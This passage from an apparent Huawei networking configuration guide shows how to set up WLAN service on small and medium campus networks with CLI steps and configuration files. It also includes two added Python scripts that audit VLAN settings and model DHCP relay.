used by the AC to communicate with the AP.
c. Configure the AP authentication mode and import the AP offline so that the AP can
go online properly.
4. Configure WLAN service parameters for STAs to access the WLAN.

Procedure
Step 1 Set the NAC mode to unified mode on the AC (default setting). Configure SwitchA and the
AC so that the AP and AC can transmit CAPWAP packets.
# Add GE0/0/1 that connects SwitchA to the AP to management VLAN 100 and add GE0/0/2
that connects SwitchA to the AC to the same VLAN.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100
[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/2] quit


# Add GE1/0/1 that connects the AC to SwitchA to VLAN 100.


<HUAWEI> system-view
[HUAWEI] sysname AC
[AC] vlan batch 100 101
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit

Step 2 Configure the AC to communicate with the upstream device.


NOTE

Configure AC uplink interfaces to transparently transmit packets of service VLANs as required and
communicate with the upstream device.

# Add AC uplink interface GE1/0/2 to service VLAN 101.


[AC] interface gigabitethernet 1/0/2
[AC-GigabitEthernet1/0/2] port link-type trunk
[AC-GigabitEthernet1/0/2] port trunk allow-pass vlan 101
[AC-GigabitEthernet1/0/2] quit

Step 3 Configure the AC as a DHCP server to allocate IP addresses to STAs and the AP.
# Configure the AC as the DHCP server to allocate an IP address to the AP from the IP
address pool on VLANIF 100, and allocate IP addresses to STAs from the IP address pool on
VLANIF 101.
[AC] dhcp enable //Enable the DHCP function.
[AC] interface vlanif 100
[AC-Vlanif100] ip address 10.23.100.1 24
[AC-Vlanif100] dhcp select interface //Configure an interface-based address pool.
[AC-Vlanif100] quit
[AC] interface vlanif 101
[AC-Vlanif101] ip address 10.23.101.1 24
[AC-Vlanif101] dhcp select interface
[AC-Vlanif101] quit

Step 4 Configure the AP to go online.


# Create an AP group and add the AP to the AP group.
[AC] wlan
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] quit

# Create a regulatory domain profile, configure the AC country code in the profile, and apply
the profile to the AP group.
[AC-wlan-view] regulatory-domain-profile name domain1
[AC-wlan-regulate-domain-domain1] country-code cn
[AC-wlan-regulate-domain-domain1] quit
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] regulatory-domain-profile domain1
Warning: Modifying the country code will clear channel, power and antenna gain configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-ap-group1] quit
[AC-wlan-view] quit

# Configure the AC's source interface.


[AC] capwap source interface vlanif 100

# Import the AP offline on the AC and add the AP to AP group ap-group1. Assume that the
AP's MAC address is 60de-4476-e360. Configure a name for the AP based on the AP's
deployment location, so that you can know where the AP is deployed from its name. For
example, name the AP area_1 if it is deployed in Area 1.
NOTE

The default AP authentication mode is MAC address authentication. If the default settings are retained, you
do not need to run the ap auth-mode mac-auth command.
In this example, the AP6010DN-AGN is used and has two radios: radio 0 (2.4 GHz radio) and radio 1 (5 GHz
radio).
[AC] wlan
[AC-wlan-view] ap auth-mode mac-auth
[AC-wlan-view] ap-id 0 ap-mac 60de-4476-e360
[AC-wlan-ap-0] ap-name area_1
[AC-wlan-ap-0] ap-group ap-group1
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-0] quit

# After the AP is powered on, run the display ap all command to check the AP state. If the
State field is displayed as nor, the AP goes online normally.
[AC-wlan-view] display ap all
Total AP information:
nor : normal [1]
----------------------------------------------------------------------------------
ID MAC Name Group IP Type State STA Uptime
----------------------------------------------------------------------------------
0 60de-4476-e360 area_1 ap-group1 10.23.100.254 AP6010DN-AGN nor 0 10S
----------------------------------------------------------------------------------
Total: 1

Step 5 Configure WLAN service parameters.

# Create security profile wlan-security and set the security policy in the profile.
NOTE

In this example, the security policy is set to WPA2+PSK+AES and password to a1234567. In actual
situations, the security policy must be configured according to service requirements.
[AC-wlan-view] security-profile name wlan-security
[AC-wlan-sec-prof-wlan-security] security wpa2 psk pass-phrase a1234567 aes //Configure security policy WPA2+PSK+AES.
[AC-wlan-sec-prof-wlan-security] quit

# Create SSID profile wlan-ssid and set the SSID name to wlan-net.
[AC-wlan-view] ssid-profile name wlan-ssid
[AC-wlan-ssid-prof-wlan-ssid] ssid wlan-net //Set the SSID to wlan-net.
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-ssid-prof-wlan-ssid] quit

# Create VAP profile wlan-vap, set the data forwarding mode and service VLAN, and apply
the security profile and SSID profile to the VAP profile.
[AC-wlan-view] vap-profile name wlan-vap
[AC-wlan-vap-prof-wlan-vap] forward-mode tunnel //Set the service forwarding mode to tunnel.
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-vap-prof-wlan-vap] service-vlan vlan-id 101 //Set the VLAN ID to 101. By default, the VLAN ID is 1.
[AC-wlan-vap-prof-wlan-vap] security-profile wlan-security
[AC-wlan-vap-prof-wlan-vap] ssid-profile wlan-ssid
[AC-wlan-vap-prof-wlan-vap] quit

# Bind VAP profile wlan-vap to the AP group and apply the profile to radio 0 and radio 1 of
the AP.
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap wlan 1 radio 0
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap wlan 1 radio 1
[AC-wlan-ap-group-ap-group1] quit

Step 6 Commit the configuration.


[AC-wlan-view] commit all
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 7 Verify the configuration.


After the service configuration is complete, run the display vap ssid wlan-net command. If
Status in the command output is displayed as ON, the VAPs have been successfully created
on AP radios.
[AC-wlan-view] display vap ssid wlan-net
WID : WLAN ID
--------------------------------------------------------------------------------
AP ID AP name RfID WID BSSID Status Auth type STA SSID
--------------------------------------------------------------------------------
0 area_1 0 1 60DE-4476-E360 ON WPA2-PSK 0 wlan-net
0 area_1 1 1 60DE-4476-E370 ON WPA2-PSK 0 wlan-net
-------------------------------------------------------------------------------
Total: 2

Connect STAs to the WLAN with SSID wlan-net and enter the password a1234567. Run the
display station ssid wlan-net command on the AC. The command output shows that the
STAs are connected to the WLAN wlan-net.
[AC-wlan-view] display station ssid wlan-net
Rf/WLAN: Radio ID/WLAN ID
Rx/Tx: link receive rate/link transmit rate(Mbps)
---------------------------------------------------------------------------------
STA MAC AP ID Ap name Rf/WLAN Band Type Rx/Tx RSSI VLAN IP address
---------------------------------------------------------------------------------
e019-1dc7-1e08 0 area_1 1/1 5G 11n 46/59 -68 101 10.23.101.254
---------------------------------------------------------------------------------
Total: 1 2.4G: 0 5G: 1

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 100
#
return


l Configuration file of the AC


#
sysname AC
#
vlan batch 100 to 101
#
dhcp enable
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
dhcp select interface
#
interface Vlanif101
ip address 10.23.101.1 255.255.255.0
dhcp select interface
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 101
#
capwap source interface vlanif100
#
wlan
security-profile name wlan-security
security wpa2 psk pass-phrase %^%#m"tz0f>~7.[`^6RWdzwCy16hJj/Mc!,}s`X*B]}A%^%# aes
ssid-profile name wlan-ssid
ssid wlan-net
vap-profile name wlan-vap
forward-mode tunnel
service-vlan vlan-id 101
ssid-profile wlan-ssid
security-profile wlan-security
regulatory-domain-profile name domain1
ap-group name ap-group1
regulatory-domain-profile domain1
radio 0
vap-profile wlan-vap wlan 1
radio 1
vap-profile wlan-vap wlan 1
ap-id 0 type-id 19 ap-mac 60de-4476-e360 ap-sn 210235554710CB000042
ap-name area_1
ap-group ap-group1
#
return

16.3 Example for Configuring the WLAN Service on Medium- and Large-Scale Campus Networks

Medium- and Large-Scale WLAN Overview


In this document, a Wireless Local Area Network (WLAN) uses 2.4 GHz or 5 GHz radio as the
transmission medium. Compared with wired networks, which are expensive, inflexible, fixed,
and lack mobility, WLANs are widely used because of their low cost, flexibility, scalability,
and mobility.
Medium and large campus WLANs are deployed in the headquarters of large and medium
enterprises, branches of large enterprises, colleges and universities, and airports.


Configuration Notes
l In this example, the security policy is WPA2-PSK-AES. To ensure network security,
choose an appropriate security policy according to your network configurations.
l In tunnel forwarding mode, the management VLAN and service VLAN cannot be the same.
If you set the forwarding mode to direct forwarding, you are also advised not to
configure the management VLAN and service VLAN to be the same.
l If direct forwarding is used, configure port isolation on the interfaces that directly
connect to APs. If port isolation is not configured, a large number of broadcast packets
will be transmitted in the VLANs, and WLAN users on different APs will be able to
communicate directly at Layer 2.
l Configure the management VLAN and service VLAN:
– In tunnel forwarding mode, service packets are encapsulated in a CAPWAP tunnel,
and then forwarded to the AC. The AC then forwards the packets to the upper-layer
network or APs. Therefore, service packets and management packets can be
normally forwarded as long as the network between the AC and APs is added to the
management VLAN and service VLAN and the network between the AC and
upper-layer network is added to the service VLAN.
– In direct forwarding mode, service packets are not encapsulated into a CAPWAP
tunnel, but are directly forwarded to the upper-layer network or APs. Therefore,
service packets and management packets can be normally forwarded only when the
network between the AC and APs is added to the management VLAN and the
network between APs and upper-layer network is added to the service VLAN.
l No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets,
they are usually sent at low rates. If a large number of such multicast packets are sent
from the network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce impact of a large number of low-rate multicast
packets on the wireless network. Exercise caution when configuring the rate limit;
otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
l The following table lists applicable products and versions.


Table 16-3 Applicable products and versions

Software Version: V200R009C00
Product Model: S12700
AP Model and Version:
l V200R007C00: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12, R230D, R240D, AP6050DN, AP6150DN, AP7050DE, AP7050DN-E, AP4030TN, AP4050DN-E, AP4050DN-HD
l V200R006C20: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP3030DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12, R230D, R240D
l V200R006C10: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP3030DN, AP2030DN
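As an added example (not from this document or from Huawei), the following Python script parses an AC configuration file in the format of the Configuration Files sections and checks the rules from the Configuration Notes: the management VLAN taken from capwap source interface must be carried on the AP-facing trunk, the service VLAN must not equal the management VLAN, the service VLAN must be trunked on the uplink or routed by a VLANIF, direct forwarding additionally needs the service VLAN on the AP-facing port, and a VAP whose security profile has no security policy is flagged. The sample configuration is constructed from the tunnel forwarding example above with the ciphered pass-phrase replaced by a placeholder; the inline placement of the AC between the AP-side switch and the upstream device, the default forwarding mode, and all function names are this example's own assumptions.

```python
import re
from dataclasses import dataclass, field
# Constructed sample, trimmed from the AC configuration file of the tunnel forwarding
# example above; the ciphered pass-phrase is replaced by a placeholder.
SAMPLE_AC_CONFIG = """\
#
interface Vlanif100
 ip address 10.23.100.1 255.255.255.0
#
interface GigabitEthernet1/0/1
 port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/2
 port trunk allow-pass vlan 101
#
capwap source interface vlanif100
#
wlan
 security-profile name wlan-security
  security wpa2 psk pass-phrase CIPHERTEXT-PLACEHOLDER aes
 vap-profile name wlan-vap
  forward-mode tunnel
  service-vlan vlan-id 101
  security-profile wlan-security
#
"""

@dataclass
class Vap:
    forward_mode: str = "direct-forward"  # assumed VRP default when not configured
    service_vlan: int = 1                 # default VLAN ID stated on the page
    security_profile: str = ""

@dataclass
class AcConfig:
    mgmt_vlan: int = 0                                # 0 = not configured
    trunk_vlans: dict = field(default_factory=dict)   # port -> {vlan ids}
    routed_vlans: set = field(default_factory=set)    # Vlanif with an IP address
    vaps: dict = field(default_factory=dict)          # profile name -> Vap
    security: dict = field(default_factory=dict)      # profile name -> policy word

def expand_vlans(spec: str) -> set:
    """VRP VLAN list such as '100 102 to 104' -> {100, 102, 103, 104}."""
    out = set()
    for a, b in re.findall(r"(\d+)(?: to (\d+))?", spec):
        out.update(range(int(a), int(b or a) + 1))
    return out

def parse_ac_config(text: str) -> AcConfig:
    cfg, iface, vap, sec = AcConfig(), None, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "#":                               # block separator ends any context
            iface = vap = sec = None
        elif m := re.match(r"interface (\S+)$", line):
            iface = m.group(1)
            cfg.trunk_vlans.setdefault(iface, set())
        elif iface and (m := re.match(r"port trunk allow-pass vlan (.+)", line)):
            cfg.trunk_vlans[iface] |= expand_vlans(m.group(1))
        elif iface and iface.lower().startswith("vlanif") and line.startswith("ip address"):
            cfg.routed_vlans.add(int(iface[6:]))
        elif m := re.match(r"capwap source interface vlanif\s*(\d+)", line):
            cfg.mgmt_vlan = int(m.group(1))
        elif m := re.match(r"security-profile name (\S+)", line):
            sec, vap = m.group(1), None
            cfg.security.setdefault(sec, "open")      # no 'security' line means open
        elif sec and (m := re.match(r"security (\S+)", line)):
            cfg.security[sec] = m.group(1)            # wpa2, wpa-wpa2, open, ...
        elif m := re.match(r"vap-profile name (\S+)", line):
            vap, sec = m.group(1), None
            cfg.vaps.setdefault(vap, Vap())
        elif vap and (m := re.match(r"forward-mode (\S+)", line)):
            cfg.vaps[vap].forward_mode = m.group(1)
        elif vap and (m := re.match(r"service-vlan vlan-id (\d+)", line)):
            cfg.vaps[vap].service_vlan = int(m.group(1))
        elif vap and (m := re.match(r"security-profile (\S+)", line)):
            cfg.vaps[vap].security_profile = m.group(1)
    return cfg

def audit(cfg: AcConfig, ap_port: str, uplink_port: str) -> list:
    """VLAN rules for an AC inline between the AP-side switch and the upstream device."""
    if not cfg.mgmt_vlan:
        return ["no 'capwap source interface vlanif' configured"]
    ap_vlans = cfg.trunk_vlans.get(ap_port, set())
    up_vlans = cfg.trunk_vlans.get(uplink_port, set())
    findings = []
    if cfg.mgmt_vlan not in ap_vlans:
        findings.append(f"{ap_port} does not carry management VLAN {cfg.mgmt_vlan}")
    for name, vap in cfg.vaps.items():
        tunnel, sv = vap.forward_mode == "tunnel", vap.service_vlan
        if sv == cfg.mgmt_vlan:   # forbidden in tunnel mode, discouraged in direct mode
            findings.append(f"{'error' if tunnel else 'warning'}: VAP {name} service VLAN {sv} equals management VLAN")
        if sv not in up_vlans and sv not in cfg.routed_vlans:   # must reach upstream
            findings.append(f"service VLAN {sv} of VAP {name} is neither trunked on {uplink_port} nor routed by a Vlanif")
        if not tunnel and sv not in ap_vlans:   # direct mode: the AP side carries it too
            findings.append(f"direct forwarding: {ap_port} does not carry service VLAN {sv}")
        if cfg.security.get(vap.security_profile, "open") == "open":
            findings.append(f"VAP {name} uses open authentication")
    return findings
```

Running audit(parse_ac_config(SAMPLE_AC_CONFIG), "GigabitEthernet1/0/1", "GigabitEthernet1/0/2") on the sample returns an empty list; changing the service VLAN to 100 or the forwarding mode to direct-forward produces findings.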

Networking Requirements
As shown in Figure 16-2, an enterprise's AC connects to the egress gateway Router of the
campus network and connects to APs through a PoE switch. The PoE switch provides power
to APs.
The enterprise requires a WLAN with SSID wlan-net so that users can access the enterprise
internal network from anywhere at any time. The Router needs to function as a DHCP server
to assign IP addresses on 10.23.101.0/24 to users, and the users are managed on the AC.


Figure 16-2 WLAN service configuration networking on a medium-scale network
[Figure: Internet -- GE2/0/0 -- Router (VLANIF 102: 10.23.102.1) -- GE1/0/2 (VLAN 102) -- AC -- GE1/0/1 (VLAN 100) -- GE0/0/2 (VLAN 100) -- PoE SwitchA -- GE0/0/1 (VLAN 100) -- AP -- STAs. Management VLAN: VLAN 100; service VLAN: VLAN 101.]

Data Planning

Table 16-4 Data planning

DHCP server: The AC functions as the DHCP server to assign IP addresses to APs, and the router functions as the DHCP server to assign IP addresses to STAs.
IP address pool for the AP: 10.23.100.2-10.23.100.254/24
IP address pool for STAs: 10.23.101.3-10.23.101.254/24
AC's source interface address: VLANIF 100: 10.23.100.1/24
AP group:
l Name: ap-group1
l Referenced profile: VAP profile wlan-vap and regulatory domain profile domain1
Regulatory domain profile:
l Name: domain1
l Country code: CN
SSID profile:
l Name: wlan-ssid
l SSID name: wlan-net
Security profile:
l Name: wlan-security
l Security policy: WPA2+PSK+AES
l Password: a1234567
VAP profile:
l Name: wlan-vap
l Forwarding mode: tunnel forwarding
l Service VLAN: VLAN 101
l Referenced profile: SSID profile wlan-ssid and security profile wlan-security

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure the AP, AC, and upstream device to implement network interconnection.
2. Configure the AC as a DHCP server to assign an IP address to the AP from an interface
IP address pool, configure the AC as a DHCP relay agent, and configure the Router
connected to the AC to assign IP addresses to STAs.
3. Configure the WLAN service so that users can connect to the Internet through the
WLAN.

Procedure
Step 1 Set the NAC mode to unified mode on the AC (default setting). Configure SwitchA and the
AC so that the AP and AC can transmit CAPWAP packets.
# Add GE0/0/1 that connects SwitchA to the AP to management VLAN 100 and add GE0/0/2
that connects SwitchA to the AC to the same VLAN.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100
[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/2] quit

# Add GE1/0/1 that connects the AC to SwitchA to VLAN 100.


[HUAWEI] sysname AC
[AC] vlan batch 100
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit


Step 2 Configure the AC to communicate with the upstream device.

# Configure VLAN 101 (service VLAN) and VLANIF 102.


[AC] vlan batch 101 102
[AC] interface vlanif 101
[AC-Vlanif101] ip address 10.23.101.1 24
[AC-Vlanif101] quit
[AC] interface vlanif 102
[AC-Vlanif102] ip address 10.23.102.2 24
[AC-Vlanif102] quit

# Configure a default route on the AC.


[AC] ip route-static 0.0.0.0 0.0.0.0 10.23.102.1 //Configure a default route destined for Router.

# Add GE1/0/2 that connects the AC to the Router to VLAN 102.


[AC] interface gigabitethernet 1/0/2
[AC-GigabitEthernet1/0/2] port link-type trunk
[AC-GigabitEthernet1/0/2] port trunk allow-pass vlan 102
[AC-GigabitEthernet1/0/2] quit

Step 3 Configure the AC to assign an IP address to the AP and the Router to assign IP addresses to
STAs.

# Configure the AC to assign an IP address to the AP from an interface IP address pool.


[AC] dhcp enable
[AC] interface vlanif 100
[AC-Vlanif100] ip address 10.23.100.1 24
[AC-Vlanif100] dhcp select interface //Configure an interface-based address pool.
[AC-Vlanif100] quit

# Configure the AC as the DHCP relay agent and enable user entry detection on the AC.
[AC] interface vlanif 101
[AC-Vlanif101] dhcp select relay //Configure the DHCP relay function.
[AC-Vlanif101] dhcp relay server-ip 10.23.102.1 //Set the DHCP server address for DHCP relay to 10.23.102.1, which resides on Router.
[AC-Vlanif101] quit

# Configure the Router as a DHCP server to allocate IP addresses to STAs.


<Huawei> system-view
[Huawei] sysname Router
[Router] dhcp enable
[Router] ip pool sta //Configure the address pool to assign IP addresses to STAs.
[Router-ip-pool-sta] gateway-list 10.23.101.1
[Router-ip-pool-sta] network 10.23.101.0 mask 24
[Router-ip-pool-sta] quit
[Router] vlan batch 102
[Router] interface vlanif 102
[Router-Vlanif102] ip address 10.23.102.1 24
[Router-Vlanif102] dhcp select global //Configure a global address pool.
[Router-Vlanif102] quit
[Router] interface gigabitethernet 2/0/0
[Router-GigabitEthernet2/0/0] port link-type trunk
[Router-GigabitEthernet2/0/0] port trunk allow-pass vlan 102
[Router-GigabitEthernet2/0/0] quit
[Router] ip route-static 10.23.101.0 24 10.23.102.2 //Configure a route on the Router destined for the network segment 10.23.101.0/24.
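To show why Step 3 needs both the sta pool on the Router and the static route back to 10.23.101.0/24, here is an added Python model of the relayed DHCP exchange (it is not part of this document and does not reproduce VRP's implementation): the AC relays the request with giaddr set to its VLANIF 101 address, the Router selects the pool by giaddr and sends the OFFER to giaddr, which only arrives if 10.23.101.0/24 is routable through 10.23.102.2. The addresses come from the page; the client MAC, the address allocation order and the function names are constructed for the example.

```python
import ipaddress

# Constructed model of the Step 3 topology above (addresses taken from the page).
AC_RELAY = {"giaddr": "10.23.101.1",     # VLANIF 101, the relay interface facing the STAs
            "server_ip": "10.23.102.1",  # dhcp relay server-ip
            "uplink_ip": "10.23.102.2"}  # VLANIF 102, source address of the relayed packet
ROUTER_POOLS = {"sta": {"network": "10.23.101.0/24", "gateway": "10.23.101.1"}}
ROUTER_CONNECTED = ["10.23.102.0/24"]                  # VLANIF 102 on the Router
ROUTER_STATIC = [("10.23.101.0/24", "10.23.102.2")]    # ip route-static on the Router

def select_pool(giaddr, pools):
    """Server-side rule for relayed requests: use the pool whose network contains
    giaddr, not the subnet the request arrived on."""
    g = ipaddress.ip_address(giaddr)
    return next((n for n, p in pools.items() if g in ipaddress.ip_network(p["network"])), None)

def route_lookup(dst, connected, static):
    """Longest-prefix match; returns 'connected', a next-hop string, or None."""
    d = ipaddress.ip_address(dst)
    candidates = [(ipaddress.ip_network(n), "connected") for n in connected]
    candidates += [(ipaddress.ip_network(n), nh) for n, nh in static]
    hits = [(n.prefixlen, nh) for n, nh in candidates if d in n]
    return max(hits)[1] if hits else None

def allocate(pool, leased=()):
    """Highest free host address, skipping the gateway (a simplification of the
    allocation policy; the only requirement here is to stay inside the pool)."""
    net = ipaddress.ip_network(pool["network"])
    for host in reversed(list(net.hosts())):
        if str(host) != pool["gateway"] and str(host) not in leased:
            return str(host)
    return None

def relay_exchange(client_mac, relay, pools, connected, static, leased=()):
    """Trace DISCOVER -> OFFER through the relay and report where it succeeds or stops."""
    # 1. The relay fills giaddr with its VLANIF 101 address and unicasts to server-ip.
    discover = {"chaddr": client_mac, "giaddr": relay["giaddr"],
                "src": relay["uplink_ip"], "dst": relay["server_ip"]}
    # 2. The server chooses the pool from giaddr and picks an address in it.
    pool = select_pool(discover["giaddr"], pools)
    if pool is None:
        return {"stage": "server", "result": "no pool matches giaddr"}
    yiaddr = allocate(pools[pool], leased)
    # 3. The OFFER is addressed to giaddr, so the server needs a route to 10.23.101.0/24.
    next_hop = route_lookup(discover["giaddr"], connected, static)
    if next_hop is None:
        return {"stage": "server", "result": "OFFER unroutable to giaddr", "pool": pool}
    # 4. The relay receives the OFFER and forwards it on VLAN 101 to the client.
    return {"stage": "client", "result": "OFFER delivered", "pool": pool,
            "yiaddr": yiaddr, "router": pools[pool]["gateway"], "next_hop": next_hop}
```

Calling relay_exchange with ROUTER_STATIC emptied reproduces the failure mode: the pool is selected correctly, but the OFFER has no route back to the relay.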

Step 4 Configure the AP to go online.

# Create an AP group and add the AP to the AP group.


[AC] wlan
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] quit

# Create a regulatory domain profile, configure the AC country code in the profile, and apply
the profile to the AP group.
[AC-wlan-view] regulatory-domain-profile name domain1
[AC-wlan-regulate-domain-domain1] country-code cn
[AC-wlan-regulate-domain-domain1] quit
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] regulatory-domain-profile domain1
Warning: Modifying the country code will clear channel, power and antenna gain configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-ap-group1] quit
[AC-wlan-view] quit

# Configure the AC's source interface.


[AC] capwap source interface vlanif 100

# Import the AP offline on the AC and add the AP to AP group ap-group1. Assume that the
AP's MAC address is 60de-4476-e360. Configure a name for the AP based on the AP's
deployment location, so that you can know where the AP is deployed from its name. For
example, name the AP area_1 if it is deployed in Area 1.
NOTE

The default AP authentication mode is MAC address authentication. If the default settings are retained, you
do not need to run the ap auth-mode mac-auth command.
In this example, the AP6010DN-AGN is used and has two radios: radio 0 (2.4 GHz radio) and radio 1 (5 GHz
radio).
[AC] wlan
[AC-wlan-view] ap auth-mode mac-auth
[AC-wlan-view] ap-id 0 ap-mac 60de-4476-e360
[AC-wlan-ap-0] ap-name area_1
[AC-wlan-ap-0] ap-group ap-group1
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-0] quit

# After the AP is powered on, run the display ap all command to check the AP state. If the
State field is displayed as nor, the AP goes online normally.
[AC-wlan-view] display ap all
Total AP information:
nor : normal [1]
----------------------------------------------------------------------------------
ID MAC Name Group IP Type State STA Uptime
----------------------------------------------------------------------------------
0 60de-4476-e360 area_1 ap-group1 10.23.100.254 AP6010DN-AGN nor 0 10S
----------------------------------------------------------------------------------
Total: 1

Step 5 Configure WLAN service parameters.


# Create security profile wlan-security and set the security policy in the profile.
NOTE

In this example, the security policy is set to WPA2+PSK+AES and password to a1234567. In actual
situations, the security policy must be configured according to service requirements.
[AC-wlan-view] security-profile name wlan-security
[AC-wlan-sec-prof-wlan-security] security wpa2 psk pass-phrase a1234567 aes //Configure security policy WPA2+PSK+AES.
[AC-wlan-sec-prof-wlan-security] quit

# Create SSID profile wlan-ssid and set the SSID name to wlan-net.
[AC-wlan-view] ssid-profile name wlan-ssid
[AC-wlan-ssid-prof-wlan-ssid] ssid wlan-net //Set the SSID to wlan-net.
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-ssid-prof-wlan-ssid] quit

# Create VAP profile wlan-vap, set the data forwarding mode and service VLAN, and apply
the security profile and SSID profile to the VAP profile.
[AC-wlan-view] vap-profile name wlan-vap
[AC-wlan-vap-prof-wlan-vap] forward-mode tunnel //Set the service forwarding mode to tunnel.
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-vap-prof-wlan-vap] service-vlan vlan-id 101 //Set the VLAN ID to 101. By default, the VLAN ID is 1.
[AC-wlan-vap-prof-wlan-vap] security-profile wlan-security
[AC-wlan-vap-prof-wlan-vap] ssid-profile wlan-ssid
[AC-wlan-vap-prof-wlan-vap] quit

# Bind VAP profile wlan-vap to the AP group and apply the profile to radio 0 and radio 1 of
the AP.
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap wlan 1 radio 0
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap wlan 1 radio 1
[AC-wlan-ap-group-ap-group1] quit

Step 6 Commit the configuration.


[AC-wlan-view] commit all
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 7 Verify the configuration.

After the service configuration is complete, run the display vap ssid wlan-net command. If
Status in the command output is displayed as ON, the VAPs have been successfully created
on AP radios.
[AC-wlan-view] display vap ssid wlan-net
WID : WLAN ID
--------------------------------------------------------------------------------
AP ID AP name RfID WID BSSID Status Auth type STA SSID
--------------------------------------------------------------------------------
0 area_1 0 1 60DE-4476-E360 ON WPA2-PSK 0 wlan-net
0 area_1 1 1 60DE-4476-E370 ON WPA2-PSK 0 wlan-net
-------------------------------------------------------------------------------
Total: 2

Connect STAs to the WLAN with SSID wlan-net and enter the password a1234567. Run the
display station ssid wlan-net command on the AC. The command output shows that the
STAs are connected to the WLAN wlan-net.
[AC-wlan-view] display station ssid wlan-net
Rf/WLAN: Radio ID/WLAN ID
Rx/Tx: link receive rate/link transmit rate(Mbps)
---------------------------------------------------------------------------------
STA MAC AP ID Ap name Rf/WLAN Band Type Rx/Tx RSSI VLAN IP address
---------------------------------------------------------------------------------
